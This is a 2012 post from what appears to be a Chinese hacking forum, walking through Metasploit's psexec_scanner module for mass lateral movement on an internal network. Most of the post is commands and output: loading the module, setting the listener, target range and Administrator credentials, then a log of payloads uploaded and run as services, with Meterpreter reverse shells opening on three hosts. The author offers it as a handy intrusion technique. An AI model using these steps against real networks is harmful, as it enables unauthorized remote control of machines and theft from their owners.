切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
192 Metasploit : 批量psexec[复制链接]
发表于 2012-10-3 20:13:11 | 显示全部楼层 |!read_mode!
在内网中不错
代码参见:https://github.com/darkoperator/ ... b/psexec_scanner.rb
下载来以后保存到 msfpath/modules/auxiliary/scanner/smb/ 然后运行MSF进入模块 查看选项
  1. msf > use auxiliary/scanner/smb/psexec_scanner
  2. msf  auxiliary(psexec_scanner) > show options

  3. Module options (auxiliary/scanner/smb/psexec_scanner):

  4.    Name       Current Setting                  Required  Description
  5.    ----       ---------------                  --------  -----------
  6.    HANDLER    true                             no        Start an Exploit Multi Handler to receive the connection
  7.    LHOST                                       yes       Local Hosts for payload to connect.
  8.    LPORT                                       yes       Local Port for payload to connect.
  9.    OPTIONS                                     no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
  10.    PAYLOAD    windows/meterpreter/reverse_tcp  yes       Payload to use against Windows host
  11.    RHOSTS                                      yes       Range of hosts to scan.
  12.    SHARE      ADMIN$                           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
  13.    SMBDomain  WORKGROUP                        yes       SMB Domain
  14.    SMBPass                                     no        SMB Password
  15.    SMBUser                                     no        SMB Username
  16.    THREADS    1                                yes       The number of concurrent threads
  17.    TYPE       manual                           no        Type of credentials to use, manual for provided one, db for those found on the database (accepted: db, manual)

  18. msf  auxiliary(psexec_scanner) >
复制代码

然后写入本地IP 监听端口 扫描的IP段 帐号和密码九行了 我要扫描的是 192.1.1.0-20
  1. msf  auxiliary(psexec_scanner) > set LHOST 192.1.1.100
  2. LHOST => 192.1.1.100
  3. msf  auxiliary(psexec_scanner) > set LPORT 5559
  4. sLPORT => 5559
  5. msf  auxiliary(psexec_scanner) > set RHOSTS 192.1.1.0-20
  6. RHOSTS => 192.1.1.0-20
  7. msf  auxiliary(psexec_scanner) > set SMBUser Administrator
  8. SMBUser => Administrator
  9. msf  auxiliary(psexec_scanner) > set SMBPass 123456
  10. SMBPass => 123456
  11. msf  auxiliary(psexec_scanner) >
复制代码

运行 等待扫描接触 他会自动监听 reverse shell
  1. msf  auxiliary(psexec_scanner) > exploit

  2. [*] Using the username and password provided
  3. [*] Starting exploit multi handler
  4. [*] Started reverse handler on 192.1.1.100:5559
  5. [*] Starting the payload handler...
  6. [*] 192.1.1.2:445 - TCP OPEN
  7. [*] Trying Administrator:123456
  8. [*] Connecting to the server...
  9. [*] Authenticating to 192.1.1.2:445|WORKGROUP as user 'Administrator'...
  10. [*] Uploading payload...
  11. [*] Created \MILJpiMz.exe...
  12. [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.2[\svcctl] ...
  13. [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.2[\svcctl] ...
  14. [*] Obtaining a service manager handle...
  15. [*] Creating a new service (rImNsjHA - "MtyVQGxQDbMmLhIaxkoqiDLNAplPz")...
  16. [*] Closing service handle...
  17. [*] Opening service...
  18. [*] Starting the service...
  19. [*] Removing the service...
  20. [*] Closing service handle...
  21. [*] Deleting \MILJpiMz.exe...
  22. [*] Sending stage (752128 bytes) to 192.1.1.2
  23. [*] Meterpreter session 1 opened (192.1.1.100:5559 -> 192.1.1.2:1035) at 2011-12-21 16:32:04 +0800
  24. [*] Scanned 03 of 21 hosts (014% complete)
  25. [*] 192.1.1.4:445 - TCP OPEN
  26. [*] Trying Administrator:123456
  27. [*] Connecting to the server...
  28. [*] Authenticating to 192.1.1.4:445|WORKGROUP as user 'Administrator'...
  29. [*] Uploading payload...
  30. [*] Created \mzYtShgr.exe...
  31. [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.4[\svcctl] ...
  32. [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.4[\svcctl] ...
  33. [*] Obtaining a service manager handle...
  34. [*] Creating a new service (HvhoAGic - "MsHkGoBGjPcTPGe")...
  35. [*] Closing service handle...
  36. [*] Opening service...
  37. [*] Starting the service...
  38. [*] Removing the service...
  39. [*] Closing service handle...
  40. [*] Deleting \mzYtShgr.exe...
  41. [*] Sending stage (752128 bytes) to 192.1.1.4
  42. [*] Meterpreter session 2 opened (192.1.1.100:5559 -> 192.1.1.4:1032) at 2011-12-21 16:32:13 +0800
  43. [*] Scanned 05 of 21 hosts (023% complete)
  44. [*] 192.1.1.5:445 - TCP OPEN
  45. [*] Trying Administrator:123456
  46. [*] Connecting to the server...
  47. [*] Authenticating to 192.1.1.5:445|WORKGROUP as user 'Administrator'...
  48. [*] Uploading payload...
  49. [*] Created \LtIwIjvR.exe...
  50. [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.5[\svcctl] ...
  51. [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.5[\svcctl] ...
  52. [*] Obtaining a service manager handle...
  53. [*] Creating a new service (fgFnEbVq - "MDVUyyTfgE")...
  54. [*] Closing service handle...
  55. [*] Opening service...
  56. [*] Starting the service...
  57. [*] Removing the service...
  58. [*] Closing service handle...
  59. [*] Deleting \LtIwIjvR.exe...
  60. [*] Sending stage (752128 bytes) to 192.1.1.5
  61. [*] Meterpreter session 3 opened (192.1.1.100:5559 -> 192.1.1.5:1035) at 2011-12-21 16:32:22 +0800
  62. [*] Scanned 07 of 21 hosts (033% complete)
  63. [*] Scanned 09 of 21 hosts (042% complete)
  64. [*] Scanned 11 of 21 hosts (052% complete)
  65. [*] Scanned 13 of 21 hosts (061% complete)
  66. [*] Scanned 15 of 21 hosts (071% complete)
  67. [*] Scanned 17 of 21 hosts (080% complete)
  68. [*] Scanned 19 of 21 hosts (090% complete)
  69. [*] Scanned 21 of 21 hosts (100% complete)
  70. [*] Auxiliary module execution completed
  71. msf  auxiliary(psexec_scanner) >
复制代码

运行真不错 扫到了3个


操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-12-2 13:55

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部